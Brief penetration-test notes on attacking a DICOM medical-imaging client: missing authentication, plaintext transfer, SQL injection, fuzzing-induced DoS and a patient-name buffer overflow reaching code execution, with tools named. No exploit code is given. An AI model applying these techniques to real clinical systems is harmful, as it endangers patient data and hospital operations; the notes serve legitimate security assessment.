Quick notes fromattacking dicom on a short engagement.
- DICOM defines standards for storing, transmitting, compressing and presenting medical images
- Eg: CT Scanner sends scanned images to a Doctor’s machine uses DICOM standard for compressing the images and DICOM protocol for transmitting over network.
- From pentesting point of view, there are few attack surfaces:
- DICOM file parser
- DICOM protocol parser
- DICOM application layer injection attacks
- The thick client application was supposed to be installed on all desktops listening on a specific port for incoming images. There was no authentication in place. Even though DICOM supports SSL, the application sent all in plaintext. All the patient data were stored unencrypted without using Microsoft DPAPI.
- Defensics has a DICOM module that can be used to fuzz the protocol parser. Because of a DOS vulnerability, it was not possible to fuzz the application using defensics. Only DOS was the outcome of this effort. Additional investigation and time would have been necessary to figure the source of the DOS vulnerability to fix before continuous fuzzing.
- Used the following GUI tool to generate and send DICOM images.
https://www.dcmsys.com/interoperability/dicom-image-generator/- Appeared to be easy for testing application layer injection attacks, simple buffer overflows etc . For sending custom binary payloads, I had to use GDCM utilities
https://github.com/malaterre/GDCM/releases. There is also pyDICOM and pynetDICOM python libraries if you would like to have more fine grained control.
- The application had a local database with patient data on it. Quickly scanning the binary for SQL statements revealed SQL injection might be possible which was later confirmed using DICOM Image Generator.
- Attacked the file parser for memory corruption by inserting large blob in patient name. It almost immediately crashed with error
- EIP did not seem to be under control. But after massaging the stack, did manage to pop up a calc on Windows 10